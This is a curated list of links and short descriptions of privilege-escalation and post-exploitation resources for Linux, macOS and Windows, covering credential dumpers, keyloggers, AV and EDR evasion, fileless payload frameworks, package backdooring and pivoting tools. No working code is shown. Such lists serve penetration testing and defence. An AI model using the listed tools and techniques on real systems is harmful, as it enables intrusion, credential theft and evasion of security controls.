Privilege Escalation & Post-Exploitation
Table of Contents
- Privilege Escalation
- Post-Exploitation
- Linux Specific
- macOS Specific
- Windows Specific
- Pivoting
- Avoiding/Bypassing Anti-Virus/Whitelisting/Sandboxes/etc
- Payloads
Linux Defense Evasion | macOS Defense Evasion | Windows Defense Evasion |
---|---|---|
Application Whitelistng | Anti-Malware Scan Interface | |
Endpoint Security Framework | Application Whitelisting | |
Gatekeeper | Windows Defender | |
System Integrity Protection | Microsoft ATA/P | |
XProtect | Device Guard | |
Privilege Escalation
Hardware-based Privilege Escalation
-
Writeups
- Windows DMA Attacks : Gaining SYSTEM shells using a generic patch
- Where there's a JTAG, there's a way: Obtaining full system access via USB
- Snagging creds from locked machines - mubix
- Bash Bunny QuickCreds – Grab Creds from Locked Machines
-
PoisonTap
- Exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js.
-
Rowhammer
- Exploiting the DRAM rowhammer bug to gain kernel privileges
- Row hammer - Wikipedia
- Another Flip in the Wall of Rowhammer Defenses
-
rowhammer.js
- Rowhammer.js - A Remote Software-Induced Fault Attack in JavaScript
- Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript
-
Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors
- Abstract. Memory isolation is a key property of a reliable and secure computing system — an access to one memory ad- dress should not have unintended side e ects on data stored in other addresses. However, as DRAM process technology scales down to smaller dimensions, it becomes more diffcult to prevent DRAM cells from electrically interacting with each other. In this paper, we expose the vulnerability of commodity DRAM chips to disturbance errors. By reading from the same address in DRAM, we show that it is possible to corrupt data in nearby addresses. More specifically, activating the same row in DRAM corrupts data in nearby rows. We demonstrate this phenomenon on Intel and AMD systems using a malicious program that generates many DRAM accesses. We induce errors in most DRAM modules (110 out of 129) from three major DRAM manufacturers. From this we conclude that many deployed systems are likely to be at risk. We identify the root cause of disturbance errors as the repeated toggling of a DRAM row’s wordline, which stresses inter-cell coupling e ects that accelerate charge leakage from nearby rows. We provide an extensive characterization study of disturbance errors and their behavior using an FPGA-based testing plat- form. Among our key findings, we show that (i) it takes as few as 139K accesses to induce an error and (ii) up to one in every 1.7K cells is susceptible to errors. After examining var- ious potential ways of addressing the problem, we propose a low-overhead solution to prevent the errors.
-
Tools
-
Inception
- Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
-
PCILeech
- PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system.
-
physmem
- physmem is a physical memory inspection tool and local privilege escalation targeting macOS up through 10.12.1. It exploits either CVE-2016-1825 or CVE-2016-7617 depending on the deployment target. These two vulnerabilities are nearly identical, and exploitation can be done exactly the same. They were patched in OS X El Capitan 10.11.5 and macOS Sierra 10.12.2, respectively.
-
rowhammer-test
- Program for testing for the DRAM "rowhammer" problem
- Tools for "Another Flip in the Wall"
-
Inception
Post-Exploitation
General Post Exploitation
-
Tactics
- MITRE ATT&CK
- Adversarial Post Ex - Lessons from the Pros
- Meta-Post Exploitation - Using Old, Lost, Forgotten Knowledge
- Operating in the Shadows - Carlos Perez - DerbyCon(2015)
-
RTLO-attack
- This is a really simple example on how to create a file with a unicode right to left ove rride character used to disguise the real extention of the file. In this example I disguise my .sh file as a .jpg file.
- Blog
-
IPFuscator
- IPFuscation is a technique that allows for IP addresses to be represented in hexadecimal or decimal instead of the decimal encoding we are used to. IPFuscator allows us to easily convert to these alternative formats that are interpreted in the same way.
- Blogpost
-
Cuteit
- A simple python tool to help you to social engineer, bypass whitelisting firewalls, potentially break regex rules for command line logging looking for IP addresses and obfuscate cleartext strings to C2 locations within the payload.
-
Living off the land: enterprise post-exploitation - Adam Reiser(Derbycon2018)
- You've compromised that initial server and gained a foothold in the target network: congratulations! But wait - the shadow file has no hashes but root, the ssh keys have strong passphrases, and all the interesting traffic is encrypted - there's nothing of value here! Or is there? In this talk, I will explore post-exploitation techniques for turning your compromised bastion hosts into active credential interceptors under a variety of blue team monitoring scenarios.
-
Execution
-
Tools
-
Shellpaste
- Tiny snippet of code that pulls ASCII shellcode from pastebin and executes it. The purpose of this is to have a minimal amount of benign code so AV doesn't freak out, then it pulls down the evil stuff. People have been doing this kind of stuff for years so I take no credit for the concept. That being said, this code (or similar code) works surprisingly often during pentests when conventional malware fails.
-
Shellpaste
-
Payloads
- Staged vs Stageless Handlers - OJ Reeves(2013)
- [Staged Payloads – What Pen Testers Should Know - Raphael Mudge(2013)]
- Deep Dive Into Stageless Meterpreter Payloads - OJ Reeves(2015)
- Payload Types in the Metasploit Framework - offensive-security
-
Tools
- Privilege Escalation * Finding Privilege Escalationswith strace & SysInternals - Diplom Mathematiker(2017)
-
Discovery
-
Browsers
-
Articles/Blogposts/Writeups
-
The Curious case of Firefox’s DevTools Storage - phl4nk(2020)
- TL;DR – Firefox stores Dev tool console data permanently (unless manually deleted). Use the script to decompress the stored data and recover any potential goodies (mainly from devs running scripts in the console).
-
DevToolReader
- Parses Indexeddb files - used to extract devtools console history
- Retrieving Data from Thunderbird and Firefox - VIVI(2020)
-
The Curious case of Firefox’s DevTools Storage - phl4nk(2020)
-
Tools
-
EyeWitness
- EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
-
gowitness
- a golang, web screenshot utility using Chrome Headless
-
WitnessMe
- Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.
-
Firepwd.py
- Firepwd.py, an open source tool to decrypt Mozilla protected passwords
-
ThunderFox
- Retrieve saved credentials from Thunderbird and Firefox.
-
EyeWitness
-
Articles/Blogposts/Writeups
-
File Discovery
-
localdataHog
- String-based secret-searching tool (high entropy and regexes) based on truffleHog.
-
localdataHog
-
Packet Sniffing
- See Network_Attacks.md
-
Finding your external IP:
- Curl any of the following addresses:
ident.me, ifconfig.me or whatsmyip.akamai.com
- Determine Public IP from CLI
- Curl any of the following addresses:
-
Virtual Machine Detection(VM Dection)
- How to determine Linux guest VM virtualization technology
-
Virtualbox
- VirtualBox Detection Via WQL Queries
- Bypassing VirtualBox Process Hardening on Windows
-
VBoxHardenedLoader
- VirtualBox VM detection mitigation loader
-
Browsers
-
Exfiltration
-
Egress Testing
- Egress Testing using PowerShell
-
Egress Buster Reverse Shell
- Egress Buster Reverse Shell – Brute force egress ports until one if found and execute a reverse shell(from trustedsec)
-
Egress-Assess
- Egress-Assess is a tool used to test egress data detection capabilities
-
File Transfer
- Articles/Blogposts/Writeups
-
Platform-Neutral
-
Updog
- Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.
-
ffsend
- Easily and securely share files and directories from the command line through a safe, private and encrypted link using a single simple command. Files are shared using the Send service and may be up to 1GB (2.5GB authenticated). Others are able to download these files with this tool, or through their web browser.
-
Updog
-
Egress Testing
-
Persistence
- List of low-level attacks/persistence techniques. HIGHLY RECOMMENDED!
- How to Remotely Control Your PC (Even When it Crashes)
- Backdooring X
-
Building a backdoored Binary
-
Pybuild
- PyBuild is a tool for automating the pyinstaller method for compiling python code into an executable. This works on Windows, Linux, and OSX (pe and elf formats)(From trustedsec)
-
Pybuild
-
PYTHONPATH
- I'm In Your $PYTHONPATH, Backdooring Your Python Programs
-
Pyekaboo
- Pyekaboo is a proof-of-concept program that is able to to hijack/hook/proxy Python module(s) thanks to $PYTHONPATH variable. It's like "DLL Search Order Hijacking" for Python.
- Defense Evasion
-
Credential Access
-
Keyloggers
-
HeraKeylogger
- Chrome Keylogger Extension
- Meltdown PoC for Reading Google Chrome Passwords
-
HeraKeylogger
-
Vulnerability Scanners
-
Lying in Wait: Discovering and Exploiting Weaknesses in Automated Discovery Actions - Timothy Wright, Jacob Griffith(Derbycon2019)
- Many IT administration systems on the market today implement some form of automated discovery process for identifying and cataloging new devices attached to the network. These discovery services often use valid credentials to access the devices for credentialed reviews/scans to improve the accuracy of the reporting. To make matters worse, these credentials are often elevated on the network and potentially whitelisted from any deception or endpoint protection suites.In this talk, we will outline several ways to abuse these services to gain legitimate credentials for a given network. Specifically, our research focused on a couple common security and management systems, but the implications are widespread. Research and tools to be released at con to help red teams demo risk.
-
Lying in Wait: Discovering and Exploiting Weaknesses in Automated Discovery Actions - Timothy Wright, Jacob Griffith(Derbycon2019)
-
Keyloggers
-
Lateral Movement
- 3rd-Party Services
-
Browser Pivoting
-
Browser Pivot for Chrome - ijustwannaredteam
- Today’s post is about Browser Pivoting with Chrome. For anyone unaware of Browser Pivoting, it’s a technique which essentially leverages an exploited system to gain access to the browser’s authenticated sessions. This is not a new technique, in fact, Raphael Mudge wrote about it in 2013. Detailed in the linked post, the Browser Pivot module for Cobalt Strike targets IE only, and as far as I know, cannot be used against Chrome. In this post we’re trying to achieve a similar result while taking a different approach – stealing the target’s Chrome profile in real time. Just a FYI, if you have the option to use Cobalt Strike’s Browser Pivot module instead, do so, it’s much cleaner.
-
Pass the Cookie and Pivot to the Clouds - wunderwuzzi
- An adversary can pivot from a compromised host to Web Applications and Internet Services by stealing authentication cookies from browsers and related processes. At the same time this technique bypasses most multi-factor authentication protocols.
-
Browser Pivot for Chrome - ijustwannaredteam
-
Collection
-
Tools
-
LaZagne
- The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
-
DumpsterDiver
- DumpsterDiver is a tool used to analyze big volumes of various file types in search of hardcoded secrets like keys (e.g. AWS Access Key, Azure Share Key or SSH keys) or passwords. Additionally, it allows creating a simple search rules with basic conditions (e.g. reports only csv file including at least 10 email addresses). The main idea of this tool is to detect any potential secret leaks. You can watch it in action in the demo video or read about all its features in this article.
-
SharpCloud
- SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.
- Packet sniffing with powershell
-
LaZagne
-
Tools
-
Miscellaneous
-
Redis
-
Redis post-exploitation - Pavel Toporkov(ZeroNights18)
- We will overview the techniques of redis post-exploitation and present new ones. In the course of the talk, you will also find out what to do if a pentester or adversary has obtained access to redis.
-
Redis post-exploitation - Pavel Toporkov(ZeroNights18)
-
Redis
-
Unsorted
-
portia
- Portia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised.
- JVM Post-Exploitation One-Liners
-
Oneliner-izer
- Convert any Python file into a single line of code which has the same functionality.
-
portia
Post-Exploitation Linux
-
101
- More on Using Bash's Built-in /dev/tcp File (TCP/IP)
- Bash Brace Expansion Cleverness - Jon Oberhide
-
Basic Linux Privilege Escalation - g0tmi1k
- Not so much a script as a resource, g0tmi1k’s blog post here has led to so many privilege escalations on Linux system’s it’s not funny. Would definitely recommend trying out everything on this post for enumerating systems.
-
Discovery
- Articles/Blogposts/Writeups
- Account Discovery
- Browser Bookmark Discovery
- File and Directory Discovery
-
Network Service Scanning
- Articles/Blogposts/Writeups
-
Tools
-
Baboossh
- BabooSSH allows you, from a simple SSH connection to a compromised host, to quickly gather info on other SSH endpoints to pivot and compromise them.
-
Baboossh
- Network Sniffing
- Password Policy Discovery
- Permission Groups Discovery
-
Process Discovery
- Articles/Blogposts/Writeups
-
Tools
-
pspy
- pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.
-
pspy
-
Remote System Discovery
-
nullinux
- nullinux is an internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB. If no username and password are provided, nullinux will attempt to connect to the target using an SMB null session. Unlike many of the enumeration tools out there already, nullinux can enumerate multiple targets at once and when finished, creates a users.txt file of all users found on the host(s). This file is formatted for direct implementation and further exploitation.This program assumes Python 2.7, and the smbclient package is installed on the machine. Run the setup.sh script to check if these packages are installed.
-
nullinux
- Software Discovery
- System Information Discovery
- System Network Configuration Discovery
- System Network Connections Discovery
- System Owner/User Discovery
-
Execution
- Articles/Blogposts/Writeups
- Tools
-
LoLBins
- Articles/Blogposts/Writeups
-
Tools
-
GTFOBins
- GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
-
GTFOPlus
- GTFOPlus is a helper script that relies on the GTFOBins repo to identify standard Linux binaries that could assist with privilege escalation.
-
GTFOBins
-
Command and Scripting Interpreter
-
Bash
-
Tools
-
Orc
- Orc is a post-exploitation framework for Linux written in Bash
-
Orc
-
Tools
-
Bash
- Exploitation for Client Execution
- Inter-Process Communication
-
Native API
- Articles/Blogposts/Writeups
-
Tools
-
msf-elf-in-memory-execution
- Post module for Metasploit to execute ELF in memory
-
msf-elf-in-memory-execution
-
Scheduled Task/Job
- At
- Launchd
- Cron
- Shared Modules
- Software Deployment Tools
-
System Services
- Launchctl
- Service Execution
-
User Execution
- Malicious Link
-
Malicious File
- Articles/Blogposts/Writeups
-
Payloads
-
Tools
-
fireELF
- fireELF is a opensource fileless linux malware framework thats crossplatform and allows users to easily create and manage payloads. By default is comes with 'memfd_create' which is a new way to run linux elf executables completely from memory, without having the binary touch the harddrive.
-
fireELF
-
Tools
-
Persistence
-
Account Manipulation
- Additional Azure Service Principal Credentials
- Exchange Email Delegate Permissions
- Add Office 365 Global Administrator Role
- SSH Authorized Keys
- BITS Jobs
-
Boot or Logon Autostart Execution
- Registry Run Keys / Startup Folder
- Authentication Package
- Time Providers
- Winlogon Helper DLL
- Security Support Provider
- Kernel Modules and Extensions
- Re-opened Applications
- LSASS Driver
- Shortcut Modification
- Port Monitors
- Plist Modification
-
Boot or Logon Initialization Scripts
- Logon Script (Windows)
- Logon Script (Mac)
- Network Logon Script
- Rc.common
- Startup Items
- Browser Extensions
- Browser Extensions
-
Compromise Client Software Binary
-
Tools
-
Debinject
- Inject malicious code into .debs
-
Debinject
-
Tools
-
Create Account
- Local Account
- Domain Account
- Cloud Account
-
Create or Modify System Process
- Launch Agent
- Systemd Service
- Windows Service
- Launch Daemon
-
Event Triggered Execution
- Change Default File Association
- Screensaver
- Windows Management Instrumentation Event Subscription
- .bash_profile and .bashrc
- Trap
- LC_LOAD_DYLIB Addition
- Netsh Helper DLL
- Accessibility Features
- AppCert DLLs
- AppInit DLLs
- Application Shimming
- Image File Execution Options Injection
- PowerShell Profile
- Emond
- Component Object Model Hijacking
- External Remote Services
-
Hijack Execution Flow
- Services File Permissions Weakness
- Executable Installer File Permissions Weakness
- Services Registry Permissions Weakness
- Path Interception by Unquoted Path
- Path Interception by PATH Environment Variable
- Path Interception by Search Order Hijacking
- DLL Search Order Hijacking
- DLL Side-Loading
- LD_PRELOAD
- Dylib Hijacking
- COR_PROFILER
- Implant Container Image
- Implant Container Image
-
Office Application Startup
- Add-ins
- Office Template Macros
- Outlook Forms
- Outlook Rules
- Outlook Home Page
- Office Test
-
Pre-OS Boot
- System Firmware
- Component Firmware
- Bootkit
-
Scheduled Task/Job
- At (Windows)
- Scheduled Task
- At (Linux)
- Launchd
- Cron
-
Server Software Component
- SQL Stored Procedures
- Transport Agent
- Web Shell
-
Traffic Signaling
- Port Knocking
-
Valid Accounts
- Default Accounts
- Domain Accounts
- Local Accounts
- Cloud Accounts
-
Account Manipulation
-
Privilege Escalation
- 101
- Articles/Blogposts/Writeups
-
Exploits
- Docker
- Dirty COW
-
Huge Dirty COW
- “Huge Dirty COW” (CVE-2017–1000405) The incomplete Dirty COW patch - Eylon Ben Yaakov
-
HugeDirtyCow PoC
- A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405)
- dirty_sock
-
dirty_sock - Linux privilege escalation exploit via snapd (CVE-2019-7304)
- In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the blog posting here.
- Linux Privilege Escalation via snapd (dirty_sock exploit)
- Kernel-based
-
Miscellaneous Software
-
Vim/Neovim Arbitrary Code Execution via Modelines - CVE-2019-12735
- Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file.
-
[0day] [exploit] Compromising a Linux desktop using... 6502 processor opcodes on the NES?! - scarybeastsecurity
- A vulnerability and a separate logic error exist in the gstreamer 0.10.x player for NSF music files. Combined, they allow for very reliable exploitation and the bypass of 64-bit ASLR, DEP, etc. The reliability is provided by the presence of a turing complete “scripting” inside a music player. NSF files are music files from the Nintendo Entertainment System. Curious? Read on...
- systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation
-
Vim/Neovim Arbitrary Code Execution via Modelines - CVE-2019-12735
-
Techniques
-
Container-based
-
Using the docker command to root the host (totally not a security issue)
- It is possible to do a few more things more with docker besides working with containers, such as creating a root shell on the host, overwriting system configuration files, reading restricted stuff, etc.
- Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials - Chris Moberly
-
Using the docker command to root the host (totally not a security issue)
- Capabilities
- Cron jobs
- Exploitation for Privilege Escalation
- GTFOBins
-
NFS
- Linux Privilege Escalation using weak NFS permissions - Haider Mahmood
- Linux Privilege Escalation using Misconfigured NFS - Raj Chandel
- NFS weak permissions(Linux Privilege Escalation) - Touhid Shaikh
- NFS, no_root_squash and SUID - Basic NFS Security - fullyautolinux
- A tale of a lesser known NFS privesc - gquere
- NFS - myexperiments.io
- PATH
-
Process Injection
- Shared Libraries
-
Setuid and Setgid
- SUID - myexperiments.io
- SUID Executables - NetbiosX
-
Tools
-
SUID3NUM
- A standalone python script which utilizes python's built-in modules to find SUID bins, separate default bins from custom bins, cross-match those with bins in GTFO Bin's repository & auto-exploit those, all with colors! ( ͡ʘ ͜ʖ ͡ʘ)
-
SUID3NUM
- Sudo
- Sudo Caching
- Valid Accounts
- Web Shell
- Wildcards
-
Writable Files
-
uptux
- Linux privilege escalation checks (systemd, dbus, socket fun, etc)
-
uptux
-
Container-based
-
Solaris
- uid=0 is deprecated: A trick unix-privesc-check doesn’t yet know - TMB
-
dtappgather-poc.sh
- Exploit PoC reverse engineered from EXTREMEPARR which provides local root on Solaris 7 - 11 (x86 & SPARC). Uses a environment variable of setuid binary dtappgather to manipulate file permissions and create a user owned directory anywhere on the system (as root). Can then add a shared object to locale folder and run setuid binaries with an untrusted library file.
- Talks/Videos
-
Tools
-
LinEnum
- This tool is great at running through a heap of things you should check on a Linux system in the post exploit process. This include file permissions, cron jobs if visible, weak credentials etc. The first thing I run on a newly compromised system.
-
Linux_Exploit_Suggester
- Linux Exploit Suggester; based on operating system release number. This program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script. Additionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version.
-
linux-exploit-suggester
- Linux privilege escalation auditing tool
-
Linux Exploit Suggester 2
- Next-Generation Linux Kernel Exploit Suggester
-
LinuxPrivChecker
- This is a great tool for once again checking a lot of standard things like file permissions etc. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the sc
- Github
-
Unix Privilege Escalation Checker
- Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files).
-
EvilAbigail
- Initrd encrypted root fs attack
-
kernelpop
- kernel privilege escalation enumeration and exploitation framework
-
GTFOPlus
- GTFOPlus is a helper script that relies on the GTFOBins repo to identify standard Linux binaries that could assist with privilege escalation.
-
LinEnum
-
Defense Evasion
- Binary Padding
- Clear Command History
- Compile After Delivery
- Connection Proxy
- Disabling Security Tools
-
Endpoint Detection Response(EDR)
-
Zombie Ant Farm: A Kit For Playing Hide and Seek with Linux EDRs.
- Zombie Ant Farm: Primitives and Offensive Tooling for Linux EDR evasion.
-
Zombie Ant Farm: A Kit For Playing Hide and Seek with Linux EDRs.
- Execution Guardrails
-
Credential Access
-
Bash History
- Articles/Blogposts
- Tools
-
Brute Force
- Articles/Blogposts
- Tools
-
Credential Dumping
-
Articles/Blogposts
-
Where 2 Worlds Collide: Bringing Mimikatz et al to UNIX - Tim(-Wadha) Brown
- What this talk is about: Why a domain joined UNIX box matters to Enterprise Admins; How AD based trust relationships on UNIX boxes are abused; How UNIX admins can help mitigate the worst side effects;
-
linikatz
- This repository contains all of the scripts and source code for "Where 2 Worlds Collide: Bringing Mimikatz et al to UNIX". In addition to the main linikatz.sh script, this also includes auditd policies, John the Ripper rules, Metasploit post-exploitation modules and fuzzers. More will follow in due course.
-
Kerberos Credential Thiever (GNU/Linux) - Ronan Loftus, Arne Zismer
- Kerberos is an authentication protocol that aims to reduce the amount of sensitive data that needs to be sent across a network with lots of network resources that require authentication. This reduces the risk of having authentication data stolen by an attacker. Network Attached Storage devices, big data processing applications like Hadoop, databases and web servers commonly run on GNU/Linux machines that are integrated in a Kerberos system. Due to the sensitivity of the data these services deal with, their security is of great importance. There has been done a lot of research about sniffing and replaying Kerberos credentials from the network. However, little work has been done on stealing credentials from Kerberos clients on GNU/Linux. We therefore investigate the feasibility of extracting and reusing Kerberos credentials from GNU/Linux machines. In this research we show that all the credentials can be extracted, independently of how they are stored on the client. We also show how these credentials can be reused to impersonate the compromised client. In order to improve the security of Kerberos, we also propose mitigations to these attacks.
- Exfiltrating credentials via PAM backdoors & DNS requests - x-c3ll
-
Where 2 Worlds Collide: Bringing Mimikatz et al to UNIX - Tim(-Wadha) Brown
-
Tools
- linikatz
-
mimipenguin
- A tool to dump the login password from the current linux user
-
3snake
- Targeting rooted servers, reads memory from sshd and sudo system calls that handle password based authentication. Doesn't write any memory to the traced processes. Spawns a new process for every sshd and sudo command that is run. Listens for the proc event using netlink sockets to get candidate processes to trace. When it receives an sshd or sudo process ptrace is attached and traces read and write system calls, extracting strings related to password based authentication.
-
Tickey
- Tool to extract Kerberos tickets from Linux kernel keys. Paper
-
Impost3r
- Impost3r is a tool that aim to steal many kinds of linux passwords(including ssh,su,sudo) written by C
-
Articles/Blogposts
-
Credentials from Web Browsers
- Articles/Blogposts
- Tools
-
Credentials in Files
- Articles/Blogposts
-
Tools
-
KeyTabExtract
- KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files, which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm, Service Principal, Encryption Type and NTLM Hash.
-
swap_digger
- swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc.
-
KeyTabExtract
-
Exploitation for Credential Access
-
Articles/Blogposts
-
Triple-Fetch-Kernel-Creds
- Attempt to steal kernelcredentials from launchd + task_t pointer (Based on: CVE-2017-7047)
-
Triple-Fetch-Kernel-Creds
- Tools
-
Articles/Blogposts
-
Input Capture
- Articles/Blogposts
-
Tools
-
SudoHulk
- This tool change sudo command, hooking the execve syscall using ptrace, tested under bash and zsh
-
SudoHulk
-
Network Sniffing
- Articles/Blogposts
- Tools
-
Private Keys
- Articles/Blogposts
- Tools
-
Steal Web Session Cookie
- Articles/Blogposts
- Tools
-
Two-Factor Authentication Interception
- Articles/Blogposts
- Tools
-
Bash History
-
Lateral Movement
- Application Deployment Software
- Exploitation of Remote Services
- Internal Spearphishing
-
Port Forwarding & Proxies
-
PortPush
- PortPush is a small Bash utility used for pivoting into internal networks upon compromising a public-facing host.
-
PortPush
- Remote File Copy
-
Remote Services
-
RDP
-
The RDP Through SSH Encyclopedia - Carrie Roberts
- I have needed to remind myself how to set up RDP access through an SSH connection so many times that I’ve decided to document it here for future reference. I hope it proves useful to you as well. I do “adversary simulation” for work and so I present this information using terms like “attacker” and “target” but this info is also useful for performing system administration tasks.
-
The RDP Through SSH Encyclopedia - Carrie Roberts
- SSH
-
RDP
- SSH Hijacking
- Third-party Software
-
Collection
- Audio Capture
- Automated Collection
- Clipboard Data
- Data from Information Repositories
-
Data from Local System
-
Tools
-
swap_digger
- swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc.
-
swap_digger
-
Tools
- Data from Network Shared Drive
- Data from Removable Media
- Data Staged
- Input Capture
- Screen Capture
Post-Exploitation OS X
-
Educational
-
Articles/Blogposts/Writeups
- The ‘app’ you can’t trash: how SIP is broken in High Sierra
- I can be Apple, and so can you - A Public Disclosure of Issues Around Third Party Code Signing Checks - Josh Pitts
- Targeting a macOS Application? Update Your Path Traversal Lists - James Sebree
- The Mac Malware of 2019 👾 a comprehensive analysis of the year's new malware - Patrick Wardle(2020)
-
Talks/Presentations/Videos
-
The Mouse is Mightier than the Sword - Patrick Wardle
- In this talk we'll discuss a vulnerability (CVE-2017-7150) found in all recent versions of macOS that allowed unprivileged code to interact with any UI component including 'protected' security dialogues. Armed with the bug, it was trivial to programmatically bypass Apple's touted 'User-Approved Kext' security feature, dump all passwords from the keychain, bypass 3rd-party security tools, and much more! And as Apple's patch was incomplete (surprise surprise) we'll drop an 0day that (still) allows unprivileged code to post synthetic events and bypass various security mechanisms on a fully patched macOS box!
-
Fire & Ice; Making and Breaking macOS firewalls - Patrick Wardle(Rootcon12)
-
When Macs Come Under ATT&CK - Richie Cyrus(Derbycon2018)
- Macs are becoming commonplace in corporate environments as a alternative to Windows systems. Developers, security teams, and executives alike favor the ease of use and full administrative control Macs provide. However, their systems are often joined to an active directory domain and ripe for attackers to leverage for initial access and lateral movement. Mac malware is evolving as Mac computers continue to grow in popularity. As a result, there is a need for proactive detection of attacks targeting MacOS systems in a enterprise environment. Despite advancements in MacOS security tooling for a single user/endpoint, little is known and discussed regarding detection at a enterprise level. This talk will discuss common tactics, techniques and procedures used by attackers on MacOS systems, as well as methods to detect adversary activity. We will take a look at known malware, mapping the techniques utilized to the MITRE ATT&CK framework. Attendees will leave equipped to begin hunting for evil lurking within their MacOS fleet.
-
- Slides
- In this talk, we’ll deep dive into recent security changes in MacOS Mojave & Safari and examine how these updates impacted actors of highly distributed malware in terms of number of infections, and more importantly - monetization. We’ll take a look at malware actors currently infecting machines in the wild (Bundlore and Genio to name a few) - and investigate how their tactics evolved after the update: From vectors of infection that bypass Gatekeeper, getting around the new TCC dialogs, hijacking search in a SIP protected Safari, to persistency and reinfection mechanisms that ultimately turn these ‘annoying PUPs’ into a fully fledged backdoored botnet.
-
Never Before Had Stierlitz Been So Close To Failure (Sergei Shevchenko(OBTS v2.0)
- Slides
- In this research, we'll dive into the installer's Mach-O binary to demonstrate how it piggy-backs on 'non-lazy' Objective-C classes, the way it dynamically unpacks its code section in memory and decrypts its config. An in-depth analysis will reveal the structure of its engine and a full scope of its hidden backdoor capabilities, anti-debugging, VM evasion techniques and other interesting tricks that are so typical to the Windows malware scene but aren’t commonly found in the unwanted apps that claim to be clean, particularly on the Mac platform. This talk reveals practical hands-on tricks used in Mach-O binary analysis under a Hackintosh VM guest, using LLDB debugger and IDA Pro disassembler, along with a very interesting marker found during such analysis. Curious to learn what that marker was? Willing to see how far the Mac-specific techniques evolved in relation to Windows malware?
-
- Objective by the Sea 354 subscribers On macOS, defenders are watching shell scripts, a few common binaries, and python usage as easy tell-tale signs of red teamers. After all, it's very anomalous for HR to start running Python, Perl, or Ruby, and Marketing employees never run shell commands. As EDR products and defenders start to get more adept at looking into macOS, it's time for red teamers to start adapting as well. The question becomes: what should you use for an agent? If only macOS had a native scripting capability geared towards automating tasks common across all disciplines that is meant to be accessible even to non-programmers. In this talk, I'll go into the research, development, and usage of a new kind of agent based on JavaScript for Automation (JXA) and how it can be used in modern red teaming operations. This agent is incorporated into a broader open source project designed for collaborative red teaming I created called Apfell. I will discuss TTPs for doing reconnaissance, persistence, injection, and some keylogging all without using a shell command or spawning another scripting language. I will go into details of how JXA can be used to create an agent complete with encrypted key exchange for secure communications, domain fronting C2, and modular design to load or change key functionality on the fly. I will also cover the defensive considerations of these TTPs and how Apple is starting to secure these capabilities going forward.
-
An 0day in macOS - Patrick Wardle(OBTSv2.0)
- Slides
- Let's talk about a powerful 0day in macOS Mojave.
-
Yin and Yang: The Art of Attack and Defense on macOS - Patrick Wardle(JNUC2019)
- This session will begin by looking at recent malware infections targeting macOS and how (interactive) attackers can further penetrate the macOS enterprise. We'll then switch gears to talk about Apple's recent macOS security improvements, then wrap up by discussing security solutions today that are able to detect advanced macOS threats that may bypass Apple’s built-in security mechanisms.
-
Offensive Ops In macOS Environments by Cedric Owens(Greyhat2020)
-
- Tools
- Writeups that didn't fit elsewhere
-
Articles/Blogposts/Writeups
-
Execution
-
General
- Apple Silicon Macs to Require Signed Code - @mjtsai(2020)
-
macOS Pop-Ups
- This repo serves as a collection of Red Team techniques and administrative tasks for various macOS versions that cause popups, what those popups look like, what permissions are being requested, where they're stored, and hopefully how to check for them before causing popups.
-
Unsorted
- macOS Research Outtakes - File Extensions - Adam Chester(2018)
- Launching Apfell Programmatically - Cedric Owens(2019)
- No Place Like Chrome - Christopher Ross(2019)
- Sparkling Payloads - Christopher Ross(2020)
- Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code - Andy Grant(2020)
- Audio Unit Plug-ins - Christopher Ross(2020)
